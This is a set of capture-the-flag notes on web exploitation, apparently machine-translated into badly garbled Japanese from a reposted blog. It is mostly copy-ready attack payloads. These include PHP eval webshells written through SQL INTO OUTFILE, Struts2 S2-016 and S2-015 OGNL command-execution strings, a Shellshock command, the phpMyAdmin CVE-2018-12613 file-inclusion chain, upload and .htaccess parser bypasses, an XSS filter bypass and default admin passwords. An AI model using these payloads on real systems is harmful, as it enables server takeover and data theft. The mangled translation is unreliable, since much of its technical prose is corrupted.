CTFノート19.8.11-19.8.27

ファイルアップロードの脆弱性
PHPのアップロードが失敗した場合、ホワイトリストファイル(接尾辞PHP5、PHP3を変更)を検討し
、/*.aspのディレクトリに、ASP、ASPのアップロードフォームとして解析されているすべてのファイルをアップロードする場合:IIS6解析の脆弱性を図TXTウマまたはウマ、接続されている(直接接続に接続されています)

SQLインジェクション
数値インジェクション:いいえ、単一引用符
文字注入:除くフロントとコメント文字単一引用符の後に、ユニバーサルパスワード「または」1「=」1
ブラインド
利用できるツール、手順、げっぷを支援するためにブラスト
定期的な注射
1と1 =(TABLE_SCHEMA INFORMATION_SCHEMA.TABLESから1を選択 '^ [AZ]たちを' = 'XXX'とテーブル名正規表現限界0,1)
注:すべての一致する正規、従来のブラインドは、nは制限異なる1、nはありません変更する必要があり
、通常のように使用される同様、同じことを
「RO%」のような)(選択したユーザ

弱いパスワードの
管理管理者/管理者admin888 /管理123456 /管理ドメイン/テストテスト/テストtest123

ファイルの解析の脆弱性の
ディレクトリ解決
/xx.asp/webshel​​l.jpgの
/xx.asa/webshel​​l.jpgの
パースファイル
webshel​​l.aspを、JPGはIIS6に適用
Apacheの解析の脆弱性
test.php.xxx.yyyサフィックスのxとyを全て認識されていません名前
コピーxx.jpg / B + yy.txt / xy.jpg 図マ- >構成sp.jpgは、<PHPのfputs(のfopen( 'payload.php書き込み '、 'W')、「<PHPの評価を?? ($ _POST [笑])> 「);?>、 高速CGI開口0x02のための/ .PHP適切なアクセスsp.jpgは/ 7.0 IIS 7.5 / nginxのバージョン<= 8.03 IIS
高速で/xx.jpg%00.phpを-CGIケースが閉じられ、nginxの<= 0.8.37
稀サフィックス
PHP芳香PHTML、PHT、PHP3、PHP4、 PHP5、PYC とピョ
.htaccessの使用
.htaccessファイルをアップロードすることができ、元の構成をカバーすることができる場合、設定ファイルが書き込まれ<FilesMatch "1">でSetHandlerアプリケーション / X-のhttpd-PHP </ FilesMatch>を使う方
権利確定条件:Apacheの設定ファイル書き込みに:AllowOverrideのすべて
のLoadModule rewrite_module /usr/lib/apache2/modules/mod_rewrite.so:ロード・モジュールのmod_rewriteは、Apacheの設定ファイルに書き込み
須藤a2enmodリライト(Ubuntuのに必要な)
使用して
MIMEタイプの評価:.htaccessの書き込み:AddTypeのアプリケーション/ X-httpd- PHP
または書き込み<FilesMatch "shell.jpgを">アプリケーションでSetHandler </ FilesMatch>を使う方/ X-HTTPD、PHP、 PHPをshell.jpgに解決できる
<FilesMatch「こんにちは」>でSetHandlerアプリケーションまたは書き込み 、/ X-のhttpd-PHP </ FilesMatch>を使う方であれば、それらは、PHPを含むハローとして解釈されます

SQLシェルを書く
。1 'SELECT連合1、。' <PHPのeval($ _ POST [A]);?>書かれた言葉とOUTFILE /var/www/tmp/a.php'#に'OUTFILE'へ*** PHP、前提:ターン進***語のサイトの一部への絶対パスを知るための
架空のパスが実際のパス破ったしたときに、絶対パスをOUTFILEに書き込むことができ
、このような労働組合をシールドとしてバイパスバイパススペースが国連組合イオンのように書き換えることができます

struct2 S2-16抜け穴は、
次のコードを構築し、その後のアクションを見つけ、(例のようにコマンドをリダイレクトし、index.actionに、コードはコマンド***の役割を実行し、ローカルにファイルをダウンロードするために)
index.actionリダイレクト:? A = $ {#(新新java.lang.ProcessBuilder(新しいjava.lang.Stringで[] { 'の LS'、 '\'}))。(開始)、#1、B =#1 a.getInputStream()、#1 C =新しいjava.io.InputStreamReader( #B)、#Dは=新しいjava.io.BufferedReader (#C)、#電子=新しいCHAR [50000]、#1 d.read(#E)、#マット=#1 context.get(「com.opensymphony.xwork2 .dispatcher.HttpServletResponse「)、#matt.getWriter()のprintln(#E)、#matt.getWriter()。フラッシュ()、#matt.getWriter()。閉じる()}
新しい新しいjava.lang.Stringで[] {「1!」、「\」 } ***コマンドとして
index.actionためのコンテンツの背後:?リダイレクトURLをトランスコードすることが必要かもしれ
コード以下は、エコーウェブサイトの絶対パスを使用することができます
index.actionリダイレクト:$ {#A =#context.get( 'com.opensymphony.xwork2.dispatcher.HttpServletRequest')、#1 B =#1 a.getSession()、#C =#b.getServletContext()、# D =#c.getRealPath( "/")、#マット=#1 context.get( 'com.opensymphony.xwork2.dispatcher.HttpServletResponse')、#matt.getWriter()のprintln(#D)、#1 matt.getWriter ().flush()、#matt.getWriter()。クローズ()}
以上代码均为ONGL表达式

bashのリモートコマンドが実行される脆弱性
CGIを見つけるために検索エンジンと/cgi-bin/x.cgi直接探して
悪用(){;}; +コマンド(げっぷキャプチャと、接続またはユーザーエージェントにこの文)
コマンドの例:
(){;};エコー; / binに/ bashの-C 'CATの/key.txt'
(){;}; エコー; / binに/ LS /
エコーは、関数に閉じ

SVNのソースコードのリークの脆弱性
/.svn/entries表示Webディレクトリ番号
などSQLiteStudioなどのデータベースソフトウェアを使用してダウンロード可能なデータベース/.svn/wc.dbオープン(またはTXT名前を変更notpadを++開こう)、そしてキーを探し

エクスプロイトの危険バイパス
<SVG> <スクリプトのXLink:(1)HREF =データ:,アラート>バイパスSVGを使用して</ SCRIPT> </ SVG>タグ

CVE-2018から12613で、PHPのバックエンドファイルインクルージョンの脆弱性
を前提:ログインのWeb
オープンSQLは、SELECT '<PHPのは、phpinfo()??>;'と書く
げっぷキャプチャ、クッキー(phpMyAdminの= XXX)を記録する
脆弱性が含まれるファイル使用して
index.phpをしますか? DB =目標sql.php%253F /../../../../../../../../../../../ TMP /セッション数以前に記録+クッキー
(セッションの保存ディレクトリのMacOSには/ var / tmpに/、保存、Linuxのセッションディレクトリ/ var / libに/ PHP /セッション )
、絶対パスを見つけるためのphpinfoでパスを見つけるためのサイトの
例:/ var / www / htmlと設定/
経由:馬を書くOUTFILE方法にSQL
OUTFILE INTO '/var/www/html/a.php'; SELECT '<PHPの@Eval($ _ POST [A])?>'

噴射HTTPヘッダ(X-転送先の場合)
または1:捕獲は、X-転送先のために書かれた中継器に送信 = 1
エラー注入がある場合に
選択組合...によって従来の射出SQL(順続きます.. 。)

struct2 s2-04抜け穴の
利用パターン:/ストラット/../ディレクトリバックトラック
バイパス:そうでない場合は、バックエンコードされた通常の明示的な試みセカンダリURLへのURLエンコードされた。..%2fと..%252F

struct2 S2-15脆弱性BR />試験:/ $ {1 + 1} .action、 実行脆弱性がある
EXPは:$ {#コンテキスト[ ' xwork.MethodAccessor.denyMethodExecution'] =偽、#1 M =#_ memberAccess.getClass ().getDeclaredField( 'allowStaticMethodAccess') 、(真memberAccess #_)(真)#m.setAccessible、#1 m.set、#Q = @ org.apache.commons.io.IOUtilsのtoString(@れるjava.lang @。 @ getRuntimeランタイム()Execの( 'LS')のgetInputStream())、Q}#の.action ..
バイパス:URLエンコード

パラメータは提出:
?/ +パラメータパラメータは、ウェブサイトに提出することができ、提出が可能なげっぷを変更することがあります

ファイル読み込み
の例を:index.phpをJPG = hei.jpg、書き換えindex.phpのJPG = index.phpをindex.phpの内容を読むことができます?

作成者PhpStorm
PhpStormの.ideaファイルが自動的にXMLファイルのセットが含まれますされ、生成されます

おすすめ

転載: blog.51cto.com/14003082/2433044